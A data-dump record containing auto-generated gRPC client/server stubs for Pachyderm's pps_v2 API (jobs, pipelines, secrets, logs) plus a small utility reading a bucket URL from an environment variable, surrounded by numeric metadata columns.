| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b9b33ca5d233a19fd52f8910238c8c269ad4cfdd
| 47,185
|
py
|
Python
|
src/python_pachyderm/proto/v2/pps/pps_pb2_grpc.py
|
pachyderm/python-pachyderm
|
9dbffba91ac753e7c63c58d71768f53f83789cb9
|
[
"Apache-2.0"
] | 57
|
2018-02-25T16:23:47.000Z
|
2022-02-08T08:48:12.000Z
|
src/python_pachyderm/proto/v2/pps/pps_pb2_grpc.py
|
pachyderm/python-pachyderm
|
9dbffba91ac753e7c63c58d71768f53f83789cb9
|
[
"Apache-2.0"
] | 209
|
2018-02-16T14:31:25.000Z
|
2022-03-15T15:24:19.000Z
|
src/python_pachyderm/proto/v2/pps/pps_pb2_grpc.py
|
pachyderm/python-pachyderm
|
9dbffba91ac753e7c63c58d71768f53f83789cb9
|
[
"Apache-2.0"
] | 23
|
2018-02-16T15:31:46.000Z
|
2022-03-09T20:41:31.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from python_pachyderm.proto.v2.pfs import pfs_pb2 as python__pachyderm_dot_proto_dot_v2_dot_pfs_dot_pfs__pb2
from python_pachyderm.proto.v2.pps import pps_pb2 as python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2
class APIStub(object):
    """Client-side stub for the pps_v2.API service.

    Exposes one multi-callable attribute per RPC (e.g. ``self.InspectJob``),
    built from the service's request/response message types.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        _pps = python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2
        _pfs = python__pachyderm_dot_proto_dot_v2_dot_pfs_dot_pfs__pb2
        _empty = google_dot_protobuf_dot_empty__pb2.Empty
        # (method name, multi-callable factory, request type, response type).
        # The full RPC path is always '/pps_v2.API/<method name>'.
        _rpcs = (
            ('InspectJob', channel.unary_unary, _pps.InspectJobRequest, _pps.JobInfo),
            ('InspectJobSet', channel.unary_stream, _pps.InspectJobSetRequest, _pps.JobInfo),
            ('ListJob', channel.unary_stream, _pps.ListJobRequest, _pps.JobInfo),
            ('ListJobSet', channel.unary_stream, _pps.ListJobSetRequest, _pps.JobSetInfo),
            ('SubscribeJob', channel.unary_stream, _pps.SubscribeJobRequest, _pps.JobInfo),
            ('DeleteJob', channel.unary_unary, _pps.DeleteJobRequest, _empty),
            ('StopJob', channel.unary_unary, _pps.StopJobRequest, _empty),
            ('InspectDatum', channel.unary_unary, _pps.InspectDatumRequest, _pps.DatumInfo),
            ('ListDatum', channel.unary_stream, _pps.ListDatumRequest, _pps.DatumInfo),
            ('RestartDatum', channel.unary_unary, _pps.RestartDatumRequest, _empty),
            ('CreatePipeline', channel.unary_unary, _pps.CreatePipelineRequest, _empty),
            ('InspectPipeline', channel.unary_unary, _pps.InspectPipelineRequest, _pps.PipelineInfo),
            ('ListPipeline', channel.unary_stream, _pps.ListPipelineRequest, _pps.PipelineInfo),
            ('DeletePipeline', channel.unary_unary, _pps.DeletePipelineRequest, _empty),
            ('StartPipeline', channel.unary_unary, _pps.StartPipelineRequest, _empty),
            ('StopPipeline', channel.unary_unary, _pps.StopPipelineRequest, _empty),
            ('RunPipeline', channel.unary_unary, _pps.RunPipelineRequest, _empty),
            ('RunCron', channel.unary_unary, _pps.RunCronRequest, _empty),
            ('CreateSecret', channel.unary_unary, _pps.CreateSecretRequest, _empty),
            ('DeleteSecret', channel.unary_unary, _pps.DeleteSecretRequest, _empty),
            ('ListSecret', channel.unary_unary, _empty, _pps.SecretInfos),
            ('InspectSecret', channel.unary_unary, _pps.InspectSecretRequest, _pps.SecretInfo),
            ('DeleteAll', channel.unary_unary, _empty, _empty),
            ('GetLogs', channel.unary_stream, _pps.GetLogsRequest, _pps.LogMessage),
            ('ActivateAuth', channel.unary_unary, _pps.ActivateAuthRequest, _pps.ActivateAuthResponse),
            ('UpdateJobState', channel.unary_unary, _pps.UpdateJobStateRequest, _empty),
            ('RunLoadTestDefault', channel.unary_unary, _empty, _pfs.RunLoadTestResponse),
        )
        for _name, _factory, _request, _response in _rpcs:
            setattr(self, _name, _factory(
                '/pps_v2.API/' + _name,
                request_serializer=_request.SerializeToString,
                response_deserializer=_response.FromString,
            ))
class APIServicer(object):
    """Server-side handler interface for the pps_v2.API service.

    Every RPC is unimplemented here; subclasses override the methods they
    actually serve.
    """

    def _unimplemented(self, context):
        # Common failure path shared by every handler: mark the RPC
        # UNIMPLEMENTED on the wire, then raise locally.
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def InspectJob(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def InspectJobSet(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def ListJob(self, request, context):
        """ListJob returns information about current and past Pachyderm jobs.
        """
        self._unimplemented(context)

    def ListJobSet(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def SubscribeJob(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def DeleteJob(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def StopJob(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def InspectDatum(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def ListDatum(self, request, context):
        """ListDatum returns information about each datum fed to a Pachyderm job
        """
        self._unimplemented(context)

    def RestartDatum(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def CreatePipeline(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def InspectPipeline(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def ListPipeline(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def DeletePipeline(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def StartPipeline(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def StopPipeline(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def RunPipeline(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def RunCron(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def CreateSecret(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def DeleteSecret(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def ListSecret(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def InspectSecret(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def DeleteAll(self, request, context):
        """DeleteAll deletes everything
        """
        self._unimplemented(context)

    def GetLogs(self, request, context):
        """Unimplemented; see the pps_v2 .proto service definition."""
        self._unimplemented(context)

    def ActivateAuth(self, request, context):
        """An internal call that causes PPS to put itself into an auth-enabled state
        (all pipeline have tokens, correct permissions, etcd)
        """
        self._unimplemented(context)

    def UpdateJobState(self, request, context):
        """An internal call used to move a job from one state to another
        """
        self._unimplemented(context)

    def RunLoadTestDefault(self, request, context):
        """RunLoadTest runs the default load test.
        """
        self._unimplemented(context)
def add_APIServicer_to_server(servicer, server):
    """Register every pps_v2.API RPC handler from ``servicer`` on ``server``."""
    _pps = python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2
    _pfs = python__pachyderm_dot_proto_dot_v2_dot_pfs_dot_pfs__pb2
    _empty = google_dot_protobuf_dot_empty__pb2.Empty
    _uu = grpc.unary_unary_rpc_method_handler
    _us = grpc.unary_stream_rpc_method_handler
    # (method name, handler factory, request type, response type).
    _specs = (
        ('InspectJob', _uu, _pps.InspectJobRequest, _pps.JobInfo),
        ('InspectJobSet', _us, _pps.InspectJobSetRequest, _pps.JobInfo),
        ('ListJob', _us, _pps.ListJobRequest, _pps.JobInfo),
        ('ListJobSet', _us, _pps.ListJobSetRequest, _pps.JobSetInfo),
        ('SubscribeJob', _us, _pps.SubscribeJobRequest, _pps.JobInfo),
        ('DeleteJob', _uu, _pps.DeleteJobRequest, _empty),
        ('StopJob', _uu, _pps.StopJobRequest, _empty),
        ('InspectDatum', _uu, _pps.InspectDatumRequest, _pps.DatumInfo),
        ('ListDatum', _us, _pps.ListDatumRequest, _pps.DatumInfo),
        ('RestartDatum', _uu, _pps.RestartDatumRequest, _empty),
        ('CreatePipeline', _uu, _pps.CreatePipelineRequest, _empty),
        ('InspectPipeline', _uu, _pps.InspectPipelineRequest, _pps.PipelineInfo),
        ('ListPipeline', _us, _pps.ListPipelineRequest, _pps.PipelineInfo),
        ('DeletePipeline', _uu, _pps.DeletePipelineRequest, _empty),
        ('StartPipeline', _uu, _pps.StartPipelineRequest, _empty),
        ('StopPipeline', _uu, _pps.StopPipelineRequest, _empty),
        ('RunPipeline', _uu, _pps.RunPipelineRequest, _empty),
        ('RunCron', _uu, _pps.RunCronRequest, _empty),
        ('CreateSecret', _uu, _pps.CreateSecretRequest, _empty),
        ('DeleteSecret', _uu, _pps.DeleteSecretRequest, _empty),
        ('ListSecret', _uu, _empty, _pps.SecretInfos),
        ('InspectSecret', _uu, _pps.InspectSecretRequest, _pps.SecretInfo),
        ('DeleteAll', _uu, _empty, _empty),
        ('GetLogs', _us, _pps.GetLogsRequest, _pps.LogMessage),
        ('ActivateAuth', _uu, _pps.ActivateAuthRequest, _pps.ActivateAuthResponse),
        ('UpdateJobState', _uu, _pps.UpdateJobStateRequest, _empty),
        ('RunLoadTestDefault', _uu, _empty, _pfs.RunLoadTestResponse),
    )
    rpc_method_handlers = {
        _name: _factory(getattr(servicer, _name),
                        request_deserializer=_request.FromString,
                        response_serializer=_response.SerializeToString)
        for _name, _factory, _request, _response in _specs
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'pps_v2.API', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class API(object):
"""Missing associated documentation comment in .proto file."""
    @staticmethod
    def InspectJob(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-unary invocation of /pps_v2.API/InspectJob (experimental gRPC API)."""
        return grpc.experimental.unary_unary(request, target, '/pps_v2.API/InspectJob',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectJobRequest.SerializeToString,
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def InspectJobSet(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-stream invocation of /pps_v2.API/InspectJobSet (experimental gRPC API)."""
        return grpc.experimental.unary_stream(request, target, '/pps_v2.API/InspectJobSet',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectJobSetRequest.SerializeToString,
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def ListJob(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-stream invocation of /pps_v2.API/ListJob (experimental gRPC API)."""
        return grpc.experimental.unary_stream(request, target, '/pps_v2.API/ListJob',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListJobRequest.SerializeToString,
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def ListJobSet(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-stream invocation of /pps_v2.API/ListJobSet (experimental gRPC API)."""
        return grpc.experimental.unary_stream(request, target, '/pps_v2.API/ListJobSet',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListJobSetRequest.SerializeToString,
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobSetInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def SubscribeJob(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-stream invocation of /pps_v2.API/SubscribeJob (experimental gRPC API)."""
        return grpc.experimental.unary_stream(request, target, '/pps_v2.API/SubscribeJob',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SubscribeJobRequest.SerializeToString,
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def DeleteJob(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-unary invocation of /pps_v2.API/DeleteJob (experimental gRPC API)."""
        return grpc.experimental.unary_unary(request, target, '/pps_v2.API/DeleteJob',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeleteJobRequest.SerializeToString,
            google_dot_protobuf_dot_empty__pb2.Empty.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def StopJob(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-unary invocation of /pps_v2.API/StopJob (experimental gRPC API)."""
        return grpc.experimental.unary_unary(request, target, '/pps_v2.API/StopJob',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StopJobRequest.SerializeToString,
            google_dot_protobuf_dot_empty__pb2.Empty.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def InspectDatum(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-unary invocation of /pps_v2.API/InspectDatum (experimental gRPC API)."""
        return grpc.experimental.unary_unary(request, target, '/pps_v2.API/InspectDatum',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectDatumRequest.SerializeToString,
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DatumInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def ListDatum(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-stream invocation of /pps_v2.API/ListDatum (experimental gRPC API)."""
        return grpc.experimental.unary_stream(request, target, '/pps_v2.API/ListDatum',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListDatumRequest.SerializeToString,
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DatumInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def RestartDatum(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-unary invocation of /pps_v2.API/RestartDatum (experimental gRPC API)."""
        return grpc.experimental.unary_unary(request, target, '/pps_v2.API/RestartDatum',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RestartDatumRequest.SerializeToString,
            google_dot_protobuf_dot_empty__pb2.Empty.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def CreatePipeline(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-unary invocation of /pps_v2.API/CreatePipeline (experimental gRPC API)."""
        return grpc.experimental.unary_unary(request, target, '/pps_v2.API/CreatePipeline',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.CreatePipelineRequest.SerializeToString,
            google_dot_protobuf_dot_empty__pb2.Empty.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def InspectPipeline(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-unary invocation of /pps_v2.API/InspectPipeline (experimental gRPC API)."""
        return grpc.experimental.unary_unary(request, target, '/pps_v2.API/InspectPipeline',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectPipelineRequest.SerializeToString,
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.PipelineInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def ListPipeline(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-stream invocation of /pps_v2.API/ListPipeline (experimental gRPC API)."""
        return grpc.experimental.unary_stream(request, target, '/pps_v2.API/ListPipeline',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListPipelineRequest.SerializeToString,
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.PipelineInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def DeletePipeline(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-unary invocation of /pps_v2.API/DeletePipeline (experimental gRPC API)."""
        return grpc.experimental.unary_unary(request, target, '/pps_v2.API/DeletePipeline',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeletePipelineRequest.SerializeToString,
            google_dot_protobuf_dot_empty__pb2.Empty.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def StartPipeline(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """One-shot unary-unary invocation of /pps_v2.API/StartPipeline (experimental gRPC API)."""
        return grpc.experimental.unary_unary(request, target, '/pps_v2.API/StartPipeline',
            python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StartPipelineRequest.SerializeToString,
            google_dot_protobuf_dot_empty__pb2.Empty.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StopPipeline(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: unary-unary call to /pps_v2.API/StopPipeline (returns Empty)."""
    return grpc.experimental.unary_unary(request, target, '/pps_v2.API/StopPipeline',
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StopPipelineRequest.SerializeToString,
        google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def RunPipeline(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: unary-unary call to /pps_v2.API/RunPipeline (returns Empty)."""
    return grpc.experimental.unary_unary(request, target, '/pps_v2.API/RunPipeline',
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RunPipelineRequest.SerializeToString,
        google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def RunCron(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: unary-unary call to /pps_v2.API/RunCron (returns Empty)."""
    return grpc.experimental.unary_unary(request, target, '/pps_v2.API/RunCron',
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RunCronRequest.SerializeToString,
        google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateSecret(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: unary-unary call to /pps_v2.API/CreateSecret (returns Empty)."""
    return grpc.experimental.unary_unary(request, target, '/pps_v2.API/CreateSecret',
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.CreateSecretRequest.SerializeToString,
        google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteSecret(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: unary-unary call to /pps_v2.API/DeleteSecret (returns Empty)."""
    return grpc.experimental.unary_unary(request, target, '/pps_v2.API/DeleteSecret',
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeleteSecretRequest.SerializeToString,
        google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListSecret(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: unary-unary call to /pps_v2.API/ListSecret (Empty request, SecretInfos response)."""
    return grpc.experimental.unary_unary(request, target, '/pps_v2.API/ListSecret',
        google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SecretInfos.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def InspectSecret(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: unary-unary call to /pps_v2.API/InspectSecret (returns SecretInfo)."""
    return grpc.experimental.unary_unary(request, target, '/pps_v2.API/InspectSecret',
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectSecretRequest.SerializeToString,
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SecretInfo.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteAll(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: unary-unary call to /pps_v2.API/DeleteAll (Empty request and response)."""
    return grpc.experimental.unary_unary(request, target, '/pps_v2.API/DeleteAll',
        google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetLogs(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: server-streaming call to /pps_v2.API/GetLogs (yields LogMessage)."""
    return grpc.experimental.unary_stream(request, target, '/pps_v2.API/GetLogs',
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.GetLogsRequest.SerializeToString,
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.LogMessage.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ActivateAuth(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: unary-unary call to /pps_v2.API/ActivateAuth (returns ActivateAuthResponse)."""
    return grpc.experimental.unary_unary(request, target, '/pps_v2.API/ActivateAuth',
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ActivateAuthRequest.SerializeToString,
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ActivateAuthResponse.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateJobState(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: unary-unary call to /pps_v2.API/UpdateJobState (returns Empty)."""
    return grpc.experimental.unary_unary(request, target, '/pps_v2.API/UpdateJobState',
        python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.UpdateJobStateRequest.SerializeToString,
        google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def RunLoadTestDefault(request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        insecure=False,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None):
    """Auto-generated stub: unary-unary call to /pps_v2.API/RunLoadTestDefault (Empty request, pfs RunLoadTestResponse)."""
    return grpc.experimental.unary_unary(request, target, '/pps_v2.API/RunLoadTestDefault',
        google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        python__pachyderm_dot_proto_dot_v2_dot_pfs_dot_pfs__pb2.RunLoadTestResponse.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 50.519272
| 135
| 0.685175
| 4,796
| 47,185
| 6.260425
| 0.040033
| 0.044763
| 0.069542
| 0.088859
| 0.896053
| 0.896053
| 0.868543
| 0.834138
| 0.831241
| 0.827111
| 0
| 0.009615
| 0.248384
| 47,185
| 933
| 136
| 50.573419
| 0.836994
| 0.043213
| 0
| 0.61165
| 1
| 0
| 0.062703
| 0.024654
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067961
| false
| 0
| 0.004854
| 0.032767
| 0.109223
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9bd04d110832c6edc74b102f432b1e4249a8682
| 94
|
py
|
Python
|
src/utils.py
|
narrahmane/mlops-pipeline
|
ef1543f6012db490b8e67ddca9ee18d7e8fe6841
|
[
"MIT"
] | null | null | null |
src/utils.py
|
narrahmane/mlops-pipeline
|
ef1543f6012db490b8e67ddca9ee18d7e8fe6841
|
[
"MIT"
] | null | null | null |
src/utils.py
|
narrahmane/mlops-pipeline
|
ef1543f6012db490b8e67ddca9ee18d7e8fe6841
|
[
"MIT"
] | null | null | null |
import os
def get_bucket_url():
    """Return the assessment bucket URL from the environment, or None when unset.

    NOTE(review): the variable name spells "ASSESMENT" — presumably a typo that
    deployments already depend on, so it is kept verbatim.
    """
    return os.environ.get('EXSCIENTIA_ASSESMENT_BUCKET_URL')
| 23.5
| 61
| 0.787234
| 14
| 94
| 4.928571
| 0.785714
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117021
| 94
| 4
| 61
| 23.5
| 0.831325
| 0
| 0
| 0
| 0
| 0
| 0.326316
| 0.326316
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
6a0ae5ff033e51de83bbafb341da32e51e1480c3
| 8,971
|
py
|
